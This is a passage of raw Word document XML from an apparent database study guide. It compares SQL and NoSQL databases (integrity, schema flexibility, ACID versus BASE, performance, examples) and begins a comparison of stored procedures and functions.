          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DB58E3"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NoSQL databases do not have a uniform query language. Each NoSQL database uses its own query methods or APIs (e.g., MongoDB uses JSON-like queries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EDB2DE"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These databases are more flexible and can store unstructured or semi-structured data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F39D2F"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5. Data Integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE1BFD6"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QL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61894237"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Strong data integrity using constraints (e.g., primary keys, foreign keys, unique constraints).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BE3123"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Ensures data consistency across related tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407000E7"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NoSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DF7B0E"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Data integrity is less strict, as NoSQL databases allow for flexible schema designs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F809975"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There may not be strict relationships between data, and denormalization is common.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138C0163"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6. Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1DEB4F"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QL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD92650"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Ideal for applications requiring strong consistency and complex querying.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489FCB90"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Use cases: Banking systems, Enterprise applications, CRM systems, ERP systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355140EF"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Well-suited for transactional systems (OLTP - Online Transaction Processing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0934E0B4"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NoSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9CFEA1"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Better suited for large-scale applications with variable data and high throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE14AE5"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Use cases: Real-time big data analytics, social media platforms, IoT applications, content management systems, and applications requiring fast reads and writes with large datasets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0702F5F5"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Well-suited for Big Data, analytics, and event-driven architectures (OLAP - Online Analytical Processing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A2656A"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7. Schema Flexibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1949D5"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QL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01323E4F"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Rigid schema; changes to the schema require database migrations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8D0C93"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New fields need to be added explicitly to the database, and changes to the data model require careful planning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6128663A"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NoSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E6A9FE"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Flexible or schema-less data models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1456D4"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lastRenderedPageBreak/>
        <w:t>The structure can change as data evolves, which allows for more agile development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7053EFE2"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8. Consistency Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F26AE61"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QL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FCB40D"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 xml:space="preserve">Follows the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ACID</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> consistency model to ensure strict consistency and data integrity during transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E943762"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NoSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371D6A37"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 xml:space="preserve">Often follows </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BASE</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Basically Available, Soft state, Eventually consistent) model, focusing on availability and partition tolerance, allowing for temporary inconsistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E80A1FC"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9. Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D330DE"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QL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0672E9"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Performance can degrade when handling large-scale or distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7352AC"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Not optimized for high-volume, low-latency workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39377E68"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NoSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F9212B"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Designed for high performance and scalability. Optimized for high-volume, low-latency workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107A29BE"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NoSQL databases can handle massive data and traffic loads more efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A01D90"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10. Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9AF85A"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QL Databases</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3662C6"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MySQL, PostgreSQL, MS SQL Server, Oracle, SQLite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037803C0"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NoSQL Databases</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E348A9C"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MongoDB, Cassandra, Redis, Couchbase, Neo4j, HBase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B63C71"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3"/>
        <w:gridCol w:w="3427"/>
        <w:gridCol w:w="3754"/>
      </w:tblGrid>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="496678B7" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A39969D"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E53DD86"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QL (Relational)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22664B60"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NoSQL (Non-relational)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="3A072936" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B31F252"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Data Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="462A3EEE"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Structured, tables with rows/columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DBD1623"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Flexible, key-value, documents, graph</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="35625595" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FC4D70E"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calability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D7B1723"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Vertical Scaling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76339EDC"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Horizontal Scaling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="2D2E6EF6" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="187A121E"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Transactions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E15CC56"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ACID-compliant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="454CC500"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BASE-compliant, Eventual Consistency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="0B244E86" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6963A4AA"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Query Language</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EB0EAAC"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SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="542784F3"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Varies by database (JSON, APIs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="6C15BC84" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AE521E8"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Data Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13526FBD"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Strong (foreign keys, constraints)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C9570D0"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Less strict, flexible schema</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="06602EBD" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18EE15CE"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Use Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00C75170"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OLTP, transactional systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="798BE1BE"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Big Data, real-time applications, analytics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="47525894" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32EDB94A"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Consistency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64EA214D"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Strong consistency (ACID)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="050C6383"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Eventual consistency (BASE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w14:paraId="6CABBE32" w14:textId="77777777" w:rsidTr="002E5BA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D1D0440"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Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D38E6F7"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Slower with large data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B0151CC"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Faster for large datasets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13AC821F"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C089FC6"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QL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> databases are ideal for applications requiring complex relationships, structured data, and strict consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E657D4"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NoSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> databases are better suited for handling large-scale, unstructured or semi-structured data with flexible schema and high availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40765E78" w14:textId="2E1E8224"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706A03BE">
          <v:rect id="_x0000_i3046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="257030CD" w14:textId="0E73B6B3" w:rsidR="00380657" w:rsidRPr="00CE4B95" w:rsidRDefault="008349E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="747" w:name="_Toc196308227"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Stored Procedure and Function</w:t>
      </w:r>
      <w:r w:rsidR="00380657" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="747"/>
    </w:p>
    <w:p w14:paraId="1E56CF26" w14:textId="15F496A3" w:rsidR="002E5BA0" w:rsidRPr="005C1C9E" w:rsidRDefault="002E5BA0" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The main difference between </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stored Procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lies in their purpose, usage, and behavior within a database system. Here is a detailed comparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0355B728"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1. Purpose and Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A601E8D"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tored Procedure</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2480B05C"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A stored procedure is a precompiled collection of one or more SQL statements that can be executed as a single unit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FA888B"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It is primarily used for performing operations like inserting, updating, or deleting data, and can execute a series of actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61553581"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A stored procedure can perform multiple tasks (e.g., multiple queries or operations) and can return multiple result sets or no result set at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF27D31"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It is often used for encapsulating business logic or handling complex operations in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB986C9"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Function</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71749985"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A function is a piece of code that returns a single value or object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21326E9E"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Functions are generally used for computing and returning values based on input parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CA5B12"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They are usually meant to return a result (scalar or table) based on specific inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1499CE"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A function is expected to return a value and can be used in SQL queries, including SELECT, WHERE, and other expressions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5D4C9F"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2. Return Type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F517954"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lastRenderedPageBreak/>
        <w:t>Stored Procedure</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A8783C"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 xml:space="preserve">Does </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> return a value directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21198538"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It can return multiple result sets or perform operations that modify data, but typically does not return a value via a function signature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B186CB7"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 xml:space="preserve">However, it can return an output value through </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OUT</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameters or through a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>status code</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
